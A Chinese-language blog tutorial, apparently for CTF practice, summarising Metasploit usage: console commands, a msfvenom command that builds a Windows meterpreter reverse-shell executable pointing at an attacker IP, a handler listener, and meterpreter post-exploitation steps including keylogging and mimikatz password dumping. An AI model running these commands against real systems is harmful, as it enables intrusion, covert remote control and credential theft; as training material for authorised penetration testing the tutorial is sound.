MSF使用说明

最新推荐文章于 2024-04-04 12:49:44 发布
最新推荐文章于 2024-04-04 12:49:44 发布
阅读量307 收藏 4
点赞数 1
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dakhda/article/details/132157974
版权

在这里插入图片描述

一、什么是MSF

MSF是metasploit framework 的简称,是一个在全球使用十分广泛的渗透框架。
MSF中有以下模块,分别为:
exploits
auxiliary
post
payload
excoders
nops
evasion
在这里插入图片描述

二、MSF的使用

1、启动SQL服务

service postgresql start
或者:systemctl start postgresql

2、初始化数据库服务

msfdb init

3、进入msf界面

msfconsole

4、查看数据库服务是否正常

db_status

5、msf常用命令

use 攻击模块
show payloads
set payloads
set target
show options
set rhosts
set rports
exploit
search

三、payload的生成:msfvenom

msfvenom -l payloads #查看msfvenom中所有的payload
msfvenom --list formats  #查看支持的后缀名的格式

生成连接马:

msfvenom -p 指定要使用的payload lhost=回连攻击机ip地址 lport=回连攻击机的端口 -f 指定要输出的payload格式 > 输出的文件路径+文件名
---------
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<攻击机IP地址> LPORT=<连接的端口号> -f exe >name.exe

本地设置监听:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2<本机ip地址>
set lport 3344<本机指定端口>
exploit

成功反弹shell…

四、meterpreter的使用

常用命令:
backgrouond  #将meterpreter会话终端隐藏在后台
sessions   #查看已经成功获取的会话,使用sessions -l
quit      #直接关闭当前的meterpreter会话终端
shell 		#获取系统的控制台shell
ps  		#查看目标主机运行的进程信息
migrate 	#将meterpreter会话从一个进程迁移到另一个进程
execute		#可在目标机器执行文件
getpid 		#获取当前会话所在进程的pid值
kill 进程号		#杀死指定进程号
getuid      #获取运行meterpreter会话的用户名,了解当前权限

键盘记录:
keyscan_start
keyscan_dump
keyscan_stop		#键盘记录

mimikatz模块:
load mimikatz	#加载mimikatz

msc				#获取hash值

kerberos		#获取明文密码

wdigest			#获取系统账户信息

mimikatz_command -f sekurlsa::searchPassword
30岁学java的貧曾
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msf使用方法
06-29
msf使用方法,很详细,你值得拥有
MSF使用教程
huangyongkang666的博客
03-26 9468
MSF使用教程 1.简介 ​ Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 2.MSF模块介绍 1.辅助模块 auxiliary 负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能 2.渗透攻击模块exploits 利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动) ​ 主动渗透攻击:发送网络数据,触发安全漏洞。比如web应用程序渗透攻击、SCADA工业控制系
MSF(Metasploit Framework)详细介绍及用法【新手篇】
最新发布
h1008685的博客
04-04 1850
MSF核心组件介绍,MSF常用模块介绍【exploit,payload,auxiliary,post-exploitation,encoder,nops,evasion】基础命令【启动msf,数据库管理,查找和使用模块,配置模块,执行模块 ,会话管理,辅助命令,系统命令】MSf初始配置【初始化数据库,创建/切换/删除工作区,扫描数据,查看扫描结果】
【渗透测试框架】Metasploit-Framework(MSF)安装与使用
做自己喜欢的事,并将其发挥到极致!
05-23 6889
文章目录前言一、Metasploit简介二、Metasploit安装及更新一键安装更新Metasploit三、Metasploit数据库连接四、Metasploit模块介绍Exploit模块Payload模块常见的几种 Stagers PayloadMeterpreter五、Metasploit实战攻击六、后渗透攻击阶段后渗透常用命令POST后渗透常用模块生成持续性后门程序Metasploit Socks代理PowerShell脚本(域内信息收集)加载stdapi升级会话SessionMeterpreter
MSF使用
qq_63980959的博客
04-05 446
Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。不需要访问目标主机磁盘,所以也没什么入侵的痕迹。
MSF使用教程
hackzkaq的博客
10-18 3万+
公众号:白帽子左一 MSF简介 Metasploit(MSF)是一个免费的、可下载的框架 它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。 因为只要掌握MSF使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。 也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所.
【工具使用】——Metasploit(MSF)使用详解(超详细)
热门推荐
weixin_45588247的博客
08-12 8万+
文章目录01Metasploit使用一、简介:二、Metasploit的安装和更新升级:1. 一键安装MSF:2. MSF的更新升级:三、使用方法:1. 基础使用:2. `MSF`中加载自定义的`exploit模块`:3. 漏洞利用(exploit):4. 攻击载荷(payload):4.1 payload模块路径::4.2 Metasploit中的 Payload 模块主要有以下三种类型:5. Meterpreter:5.1 Meterpreter是如何工作的?:5.2 Meterpreter的特点:6.
MSF使用详解
m0_52051132的博客
10-19 7712
一、 Meterpreter是什么Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。
随记(msf数据库连接问题)
m0_64050745的博客
04-27 612
随笔(msfconfig数据库连接不成功问题)
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4296
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用
MSF技术总结
05-07
metasploit framework 常用命令说明使用,及其他高级用法的使用总结
变频器说明书系列-MSF.pdf
04-30
变频器说明书系列-MSF.pdf
变频器说明书大全系列-MSF.rar
04-30
变频器说明书大全系列-MSF.rar
依尔通(Emotron)变频器MSF说明书.rar
10-10
依尔通(Emotron)变频器MSF说明书rar,依尔通(Emotron)变频器MSF说明
基于MSF的增强版多源传感器融合框架 (VSLAMIMUGNSS).zip
01-24
同时由于MSF原始代码非常的不优美简洁,所以我特地将MSF源码作为一个“库”来使用,而将我们可以扩展和开发的部分单独提取出来开发成MSF_developed,这样对代码理解和使用会有更好的帮助。需要提前说明的是,由于...
msf基本使用,基本命令说明
cjh12340826的博客
07-10 2064
xxx_nonx_tcp : no execute 或 win7 (NX是应用在cpu的一种可以防止缓冲区溢出的技术)shell_reverse_tcp:反向连接到攻击者主机并创建一个shell。reverse_http: 通过HTTP隧道通信并创建一个新用户添加到管理组。shell_find_tag: 在已建立的连接上创建一个shell。add_user :创建一个新用户添加到管理组。bind_tcp : 监听一个tcp连接。21,version显示一个控制台版本。7,info 显示一个模块的详细信息。
超实用!手把手教你如何用MSF进行后渗透测试!
xv66666的博客
07-20 955
Meterpreter的shell运行在内存中,目标重启就会失效,如果管理员给系统打上补丁,那么就没办法再次使用exploit获取权限,所以需要持久的后门对目标进行控制。Meterpreter 是msf的一个payload,目标执行之后,我们会得到一个会话,和常见的shell会话类似,但是它的功能更加强大,它是执行后渗透测试的实施通道。msf提供了一个功能模块可以让我们假冒别人的令牌,实现身份切换,如果目标环境是域环境,刚好域管理员登录过我们已经有权限的终端,那么就可以假冒成域管理员的角色。
Metasploit(MSF)渗透测试框架使用教程及基本命令
qq_44433172的博客
05-30 3861
第一章 Metasploit渗透框架介绍及体系框架 1.1 Metasploit 渗透测试框架介绍   Metasploit 是一个渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一。使您能够查找,利用和验证漏洞。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造成一个攻击工具开发平台。 1.2 Metasploit 体系框架  模块:模块组织按照不同的用途分为6种类型的模块 分为辅助模块(Aux)、渗透攻击模块(Exploits)、后渗透攻击模块(Post)
kali 的msf怎么使用
03-31
Msf是Metasploit Framework的缩写,是一款开源的网络安全渗透测试工具。在Kali Linux中,Msf已经预装好了,可以通过以下步骤启动Msf: 1. 打开终端,输入命令“msfconsole”进入Msf控制台。 2. 在控制台中输入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值